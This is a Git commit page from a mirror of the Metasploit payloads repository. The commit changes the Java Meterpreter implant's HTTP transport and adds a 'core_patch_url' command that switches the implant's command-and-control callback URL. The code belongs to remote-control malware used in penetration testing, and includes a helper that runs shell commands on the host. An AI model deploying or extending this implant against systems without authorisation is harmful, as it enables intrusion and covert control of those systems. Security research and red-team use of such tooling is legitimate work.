github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-05-06 16:09:38 +02:00
Code Releases Activity

add core_patch_url, fix android stageless http

Browse Source
This commit is contained in:
Tim 2016-09-14 15:27:13 +01:00
parent dbeb5c2cb2
commit 07cf905733
5 changed files with 38 additions and 10 deletions
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter
HttpTransport.javaTLVPacket.javaUtils.java
core
Loader.javacore_patch_url.java

22
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/HttpTransport.java

@ -142,6 +142,9 @@ public class HttpTransport extends Transport {
// is the situation that happens on initial connect (not reconnect) // is the situation that happens on initial connect (not reconnect)
TLVPacket response = request.createResponse(); TLVPacket response = request.createResponse();
int result = met.getCommandManager().executeCommand(met, request, response); int result = met.getCommandManager().executeCommand(met, request, response);
if (result == Command.EXIT_DISPATCH) {
return true;
}
this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE); this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);
return true; return true;
@ -209,6 +212,7 @@ public class HttpTransport extends Transport {
while (!met.hasSessionExpired() && while (!met.hasSessionExpired() &&
System.currentTimeMillis() < lastPacket + this.commTimeout) { System.currentTimeMillis() < lastPacket + this.commTimeout) {
try { try {
useNextUrl();
TLVPacket request = this.readPacket(); TLVPacket request = this.readPacket();
if (request != null) { if (request != null) {
@ -237,21 +241,21 @@ public class HttpTransport extends Transport {
break; break;
} }
// see if we switched URLs along the way, and if we did, move it on over.
// This is really only used for stageless payloads (not yet implemented in
// msf for this, but we're getting there). The command for this hasn't yet
// been wired in.
if (this.nextUrl != null) {
this.url = this.nextUrl.toString();
this.targetUrl = this.nextUrl;
this.nextUrl = null;
}
} }
// if we get here we assume things aren't good. // if we get here we assume things aren't good.
return false; return false;
} }
private void useNextUrl() {
// see if we switched URLs along the way, and if we did, move it on over.
if (this.nextUrl != null) {
this.url = this.nextUrl.toString();
this.targetUrl = this.nextUrl;
this.nextUrl = null;
}
}
private URLConnection createConnection() { private URLConnection createConnection() {
URLConnection conn = null; URLConnection conn = null;

2
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVPacket.java

@ -270,7 +270,7 @@ public class TLVPacket {
public TLVPacket createResponse() throws IOException { public TLVPacket createResponse() throws IOException {
TLVPacket response = new TLVPacket(); TLVPacket response = new TLVPacket();
response.add(TLVType.TLV_TYPE_METHOD, this.getStringValue(TLVType.TLV_TYPE_METHOD)); response.add(TLVType.TLV_TYPE_METHOD, this.getStringValue(TLVType.TLV_TYPE_METHOD));
response.add(TLVType.TLV_TYPE_REQUEST_ID, this.getStringValue(TLVType.TLV_TYPE_REQUEST_ID)); response.add(TLVType.TLV_TYPE_REQUEST_ID, this.getStringValue(TLVType.TLV_TYPE_REQUEST_ID, null));
return response; return response;
} }

5
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java

@ -9,6 +9,11 @@ import java.net.UnknownHostException;
public class Utils { public class Utils {
public static void log(String log) {
StackTraceElement stack = new Throwable().getStackTrace()[1];
System.err.println("" + stack.getFileName() + ":" + stack.getLineNumber() + "=" + log);
}
public static String runCommand(String command) throws IOException { public static String runCommand(String command) throws IOException {
Process process = Runtime.getRuntime().exec(command); Process process = Runtime.getRuntime().exec(command);
BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream())); BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));

1
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java

@ -21,6 +21,7 @@ public class Loader implements ExtensionLoader {
mgr.registerCommand("core_loadlib", core_loadlib.class); mgr.registerCommand("core_loadlib", core_loadlib.class);
mgr.registerCommand("core_uuid", core_uuid.class); mgr.registerCommand("core_uuid", core_uuid.class);
mgr.registerCommand("core_machine_id", core_machine_id.class); mgr.registerCommand("core_machine_id", core_machine_id.class);
mgr.registerCommand("core_patch_url", core_patch_url.class);
mgr.registerCommand("core_shutdown", core_shutdown.class); mgr.registerCommand("core_shutdown", core_shutdown.class);
mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class); mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class);
mgr.registerCommand("core_transport_list", core_transport_list.class); mgr.registerCommand("core_transport_list", core_transport_list.class);

18
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_patch_url.java Normal file

@ -0,0 +1,18 @@
package com.metasploit.meterpreter.core;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
public class core_patch_url implements Command {
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
String patchUrl = request.getStringValue(TLVType.TLV_TYPE_TRANS_URL);
if (meterpreter.getTransports().current().switchUri(patchUrl)) {
return EXIT_DISPATCH;
} else {
return ERROR_FAILURE;
}
}
}